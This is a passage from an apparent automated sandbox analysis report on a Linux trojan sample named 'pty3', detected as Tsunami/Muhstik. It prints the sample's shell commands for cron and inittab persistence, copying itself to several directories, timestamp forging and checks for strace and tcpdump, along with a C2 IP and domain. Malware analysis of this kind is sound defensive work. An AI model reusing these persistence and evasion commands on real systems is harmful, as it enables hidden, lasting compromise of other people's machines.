            Source: /bin/sh (PID: 5262)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5268)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5267)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5282)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5290)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5289)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5304)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5309)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5308)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5324)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5331)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5330)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /usr/bin/cp (PID: 5255)File written: /dev/shm/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5276)File written: /var/tmp/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5298)File written: /run/lock/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5318)File written: /run/pty3Jump to dropped file
            Source: /bin/sh (PID: 5239)Grep executable: /usr/bin/grep -> grep /tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5240)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5237)Grep executable: /usr/bin/grep -> grep -v /tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5263)Grep executable: /usr/bin/grep -> grep /dev/shm/pty3Jump to behavior
            Source: /bin/sh (PID: 5264)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5261)Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty3Jump to behavior
            Source: /bin/sh (PID: 5283)Grep executable: /usr/bin/grep -> grep /var/tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5284)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5281)Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5305)Grep executable: /usr/bin/grep -> grep /var/lock/pty3Jump to behavior
            Source: /bin/sh (PID: 5306)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5303)Grep executable: /usr/bin/grep -> grep -v /var/lock/pty3Jump to behavior
            Source: /bin/sh (PID: 5325)Grep executable: /usr/bin/grep -> grep /var/run/pty3Jump to behavior
            Source: /bin/sh (PID: 5326)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5323)Grep executable: /usr/bin/grep -> grep -v /var/run/pty3Jump to behavior
            Source: /usr/bin/crontab (PID: 5243)Crontab like entry written: /var/spool/cron/crontabs/tmp.001wAFJump to dropped file
            Source: /usr/bin/crontab (PID: 5267)Crontab like entry written: /var/spool/cron/crontabs/tmp.FFzEXtJump to dropped file
            Source: /usr/bin/crontab (PID: 5289)Crontab like entry written: /var/spool/cron/crontabs/tmp.7EMzq6Jump to dropped file
            Source: /usr/bin/crontab (PID: 5308)Crontab like entry written: /var/spool/cron/crontabs/tmp.2HVWUAJump to dropped file
            Source: /usr/bin/crontab (PID: 5330)Crontab like entry written: /var/spool/cron/crontabs/tmp.ASDRldJump to dropped file
            Source: /tmp/pty3 (PID: 5224)Shell command executed: sh -c "pidof -x strace > /dev/null"Jump to behavior
            Source: /tmp/pty3 (PID: 5226)Shell command executed: sh -c "pidof -x tcpdump > /dev/null"Jump to behavior
            Source: /tmp/pty3 (PID: 5232)Shell command executed: sh -c "crontab -r"Jump to behavior
            Source: /tmp/pty3 (PID: 5234)Shell command executed: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5233)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5241)Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5245)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5247)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5249)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5252)Shell command executed: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5259)Shell command executed: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5258)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5265)Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5269)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5271)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5273)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5275)Shell command executed: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5279)Shell command executed: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5278)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5287)Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5291)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5293)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5295)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5297)Shell command executed: sh -c "cp -f /tmp/pty3 /var/lock/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5301)Shell command executed: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5300)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5310)Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5311)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5313)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5315)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5317)Shell command executed: sh -c "cp -f /tmp/pty3 /var/run/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5321)Shell command executed: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5320)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5327)Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5329)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5333)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5335)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5254)Shell command executed: sh -c "/bin/uname -n"Jump to behavior
            Source: /bin/sh (PID: 5248)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5272)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5294)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5314)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5334)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5250)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5274)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5296)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5316)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5336)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: submitted sampleStderr: cat: /etc/inittabno crontab for rootno crontab for root: No such file or directoryno crontab for root: exit code = 0

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Uses known network protocols on non-standard portsShow sources
            Source: unknownNetwork traffic detected: IRC traffic on port 48714 -> 8080
            Source: unknownNetwork traffic detected: IRC traffic on port 48714 -> 8080
            Source: /bin/uname (PID: 5256)Queries kernel information via 'uname': Jump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected MuhstikShow sources
            Source: Yara matchFile source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected TsunamiShow sources
            Source: Yara matchFile source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5223, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5230, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5231, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5251, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5257, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5277, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5299, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5319, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected MuhstikShow sources
            Source: Yara matchFile source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected TsunamiShow sources
            Source: Yara matchFile source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5223, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5230, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5231, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5251, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5257, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5277, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5299, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5319, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job11Scheduled Task/Job11Scheduled Task/Job11Scripting1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting1At (Linux)1At (Linux)1Timestomp1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Indicator Removal on Host1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 544445 Sample: pty3 Startdate: 23/12/2021 Architecture: LINUX Score: 96 107 156.67.220.165, 48714, 8080 AS-HOSTINGERLT Cyprus 2->107 109 l.deutschland-zahlung.net 2->109 111 4 other IPs or domains 2->111 115 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->115 117 Multi AV Scanner detection for submitted file 2->117 119 Yara detected Tsunami 2->119 121 3 other signatures 2->121 11 pty3 2->11         started        signatures3 process4 process5 13 pty3 11->13         started        15 pty3 11->15         started        17 pty3 11->17         started        19 8 other processes 11->19 process6 21 pty3 13->21         started        23 pty3 13->23         started        25 pty3 13->25         started        36 25 other processes 13->36 27 pty3 sh 15->27         started        29 pty3 sh 17->29         started        31 sh touch 19->31         started        34 pty3 sh 19->34         started        38 6 other processes 19->38 signatures7 40 pty3 sh 21->40         started        42 pty3 sh 23->42         started        44 pty3 sh 25->44         started        46 sh crontab 27->46         started        56 4 other processes 27->56 50 sh crontab 29->50         started        127 Explicitly modifies time stamps using the "touch" command 31->127 52 sh uname 34->52         started        54 pty3 sh 36->54         started        58 24 other processes 36->58 process8 file9 60 sh crontab 40->60         started        72 4 other processes 40->72 64 sh crontab 42->64         started        74 4 other processes 42->74 66 sh crontab 44->66         started        76 4 other processes 44->76 97 /var/spool/cron/crontabs/tmp.001wAF, ASCII 46->97 dropped 129 Sample tries to persist itself using cron 46->129 131 Executes the "crontab" command typically for achieving persistence 46->131 68 sh crontab 54->68         started        78 4 other processes 54->78 70 sh crontab 56->70         started        99 /var/tmp/pty3, ELF 58->99 dropped 101 /run/pty3, ELF 58->101 dropped 103 /run/lock/pty3, ELF 58->103 dropped 105 2 other malicious files 58->105 dropped 133 Writes identical ELF files to multiple locations 58->133 135 Explicitly modifies time stamps using the "touch" command 58->135 signatures10 process11 file12 89 /var/spool/cron/crontabs/tmp.FFzEXt, ASCII 60->89 dropped 123 Sample tries to persist itself using cron 60->123 125 Executes the "crontab" command typically for achieving persistence 60->125 91 /var/spool/cron/crontabs/tmp.7EMzq6, ASCII 64->91 dropped 93 /var/spool/cron/crontabs/tmp.2HVWUA, ASCII 66->93 dropped 95 /var/spool/cron/crontabs/tmp.ASDRld, ASCII 68->95 dropped 80 sh crontab 72->80         started        83 sh crontab 74->83         started        85 sh crontab 76->85         started        87 sh crontab 78->87         started        signatures13 process14 signatures15 113 Executes the "crontab" command typically for achieving persistence 80->113

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pty343%VirustotalBrowse
            pty351%ReversingLabsLinux.Trojan.Tsunami

            Dropped Files

            SourceDetectionScannerLabelLink
            /dev/shm/pty343%VirustotalBrowse
            /dev/shm/pty351%ReversingLabsLinux.Trojan.Tsunami
            /run/lock/pty343%VirustotalBrowse
            /run/lock/pty351%ReversingLabsLinux.Trojan.Tsunami
            /run/pty351%ReversingLabsLinux.Trojan.Tsunami
            /var/tmp/pty351%ReversingLabsLinux.Trojan.Tsunami

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            l.deutschland-zahlung.net
            unknown
            unknowntrue
              unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              45.132.241.68
              unknownGermany
              47583AS-HOSTINGERLTfalse
              156.67.220.165
              unknownCyprus
              47583AS-HOSTINGERLTtrue
              109.202.202.202
              unknownSwitzerland
              13030INIT7CHfalse
              91.189.91.43
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              91.189.91.42
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse


              Runtime Messages

              Command:/tmp/pty3
              Exit Code:0
              Exit Code Info:
              Killed:False
              Standard Output:

              Standard Error:cat: /etc/inittabno crontab for root
              no crontab for root
              : No such file or directory
              no crontab for root

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              156.67.220.165pty4Get hashmaliciousBrowse
                pty4Get hashmaliciousBrowse
                  109.202.202.202pty4Get hashmaliciousBrowse
                    ju6Wbtio60Get hashmaliciousBrowse
                      RvDKaRDE3kGet hashmaliciousBrowse
                        20DMSKyJbkGet hashmaliciousBrowse
                          HrNNgx1ZG7Get hashmaliciousBrowse
                            UZBQyM62OcGet hashmaliciousBrowse
                              z6jmJpo1pXGet hashmaliciousBrowse
                                Cq2ydpw3TfGet hashmaliciousBrowse
                                  8qoiarDkDCGet hashmaliciousBrowse
                                    4Ks3mBzVngGet hashmaliciousBrowse
                                      H5V4UsjFzHGet hashmaliciousBrowse
                                        Pe3HHKmZE6Get hashmaliciousBrowse
                                          ovVhfBgkQlGet hashmaliciousBrowse
                                            5kVsQcLDDhGet hashmaliciousBrowse
                                              3zO446cx2sGet hashmaliciousBrowse
                                                2X6QIRRS4lGet hashmaliciousBrowse
                                                  oewnQ6R3TQGet hashmaliciousBrowse
                                                    3C78SULNtdGet hashmaliciousBrowse
                                                      AVXhknAf97Get hashmaliciousBrowse
                                                        qUcT4ggKE9Get hashmaliciousBrowse
                                                          91.189.91.43pty4Get hashmaliciousBrowse
                                                            ju6Wbtio60Get hashmaliciousBrowse
                                                              RvDKaRDE3kGet hashmaliciousBrowse
                                                                20DMSKyJbkGet hashmaliciousBrowse
                                                                  HrNNgx1ZG7Get hashmaliciousBrowse
                                                                    UZBQyM62OcGet hashmaliciousBrowse
                                                                      z6jmJpo1pXGet hashmaliciousBrowse
                                                                        Cq2ydpw3TfGet hashmaliciousBrowse
                                                                          8qoiarDkDCGet hashmaliciousBrowse
                                                                            4Ks3mBzVngGet hashmaliciousBrowse
                                                                              H5V4UsjFzHGet hashmaliciousBrowse
                                                                                Pe3HHKmZE6Get hashmaliciousBrowse
                                                                                  ovVhfBgkQlGet hashmaliciousBrowse
                                                                                    5kVsQcLDDhGet hashmaliciousBrowse
                                                                                      3zO446cx2sGet hashmaliciousBrowse
                                                                                        2X6QIRRS4lGet hashmaliciousBrowse
                                                                                          oewnQ6R3TQGet hashmaliciousBrowse
                                                                                            3C78SULNtdGet hashmaliciousBrowse
                                                                                              AVXhknAf97Get hashmaliciousBrowse
                                                                                                qUcT4ggKE9Get hashmaliciousBrowse
                                                                                                  91.189.91.42pty4Get hashmaliciousBrowse
                                                                                                    ju6Wbtio60Get hashmaliciousBrowse
                                                                                                      RvDKaRDE3kGet hashmaliciousBrowse
                                                                                                        20DMSKyJbkGet hashmaliciousBrowse
                                                                                                          HrNNgx1ZG7Get hashmaliciousBrowse
                                                                                                            UZBQyM62OcGet hashmaliciousBrowse
                                                                                                              z6jmJpo1pXGet hashmaliciousBrowse
                                                                                                                Cq2ydpw3TfGet hashmaliciousBrowse
                                                                                                                  8qoiarDkDCGet hashmaliciousBrowse
                                                                                                                    4Ks3mBzVngGet hashmaliciousBrowse
                                                                                                                      H5V4UsjFzHGet hashmaliciousBrowse
                                                                                                                        Pe3HHKmZE6Get hashmaliciousBrowse
                                                                                                                          ovVhfBgkQlGet hashmaliciousBrowse
                                                                                                                            5kVsQcLDDhGet hashmaliciousBrowse
                                                                                                                              3zO446cx2sGet hashmaliciousBrowse
                                                                                                                                2X6QIRRS4lGet hashmaliciousBrowse
                                                                                                                                  oewnQ6R3TQGet hashmaliciousBrowse
                                                                                                                                    3C78SULNtdGet hashmaliciousBrowse
                                                                                                                                      AVXhknAf97Get hashmaliciousBrowse
                                                                                                                                        qUcT4ggKE9Get hashmaliciousBrowse

                                                                                                                                          Domains

                                                                                                                                          No context

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          AS-HOSTINGERLTpty4Get hashmaliciousBrowse
                                                                                                                                          • 156.67.220.165
                                                                                                                                          1POs12.docGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          pty4Get hashmaliciousBrowse
                                                                                                                                          • 156.67.220.165
                                                                                                                                          pty1Get hashmaliciousBrowse
                                                                                                                                          • 45.132.242.233
                                                                                                                                          gNHWpkzcZ2Get hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          bWWYiK6e8PGet hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          02tGmRk9B8Get hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          ZcxVQiqSNTGet hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          SKM6197534BT New Order.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          RFQ - Mopcoms Turkey .xlsxGet hashmaliciousBrowse
                                                                                                                                          • 45.130.228.232
                                                                                                                                          Logo Embroidery-Auto Inquiry.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          AUCAe6w7Nm.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Request for Quotation - 4RFQ001247.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Quotation for Urgent PO 110921.exeGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          j1MTWQvoZS.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          fhs2UR1fSG.exeGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          PO 211213-0221A.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.168.192.133
                                                                                                                                          GHPYl58St4.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          DHL SHIPMENT ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Aviso 9858.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 37.44.244.177
                                                                                                                                          INIT7CHpty4Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          ju6Wbtio60Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          RvDKaRDE3kGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          20DMSKyJbkGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          HrNNgx1ZG7Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          UZBQyM62OcGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          z6jmJpo1pXGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          Cq2ydpw3TfGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          8qoiarDkDCGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          4Ks3mBzVngGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          H5V4UsjFzHGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          Pe3HHKmZE6Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          ovVhfBgkQlGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          5kVsQcLDDhGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          3zO446cx2sGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          2X6QIRRS4lGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          oewnQ6R3TQGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          3C78SULNtdGet hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          AVXhknAf97Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          qUcT4ggKE9Get hashmaliciousBrowse
                                                                                                                                          • 109.202.202.202
                                                                                                                                          AS-HOSTINGERLTpty4Get hashmaliciousBrowse
                                                                                                                                          • 156.67.220.165
                                                                                                                                          1POs12.docGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          pty4Get hashmaliciousBrowse
                                                                                                                                          • 156.67.220.165
                                                                                                                                          pty1Get hashmaliciousBrowse
                                                                                                                                          • 45.132.242.233
                                                                                                                                          gNHWpkzcZ2Get hashmaliciousBrowse
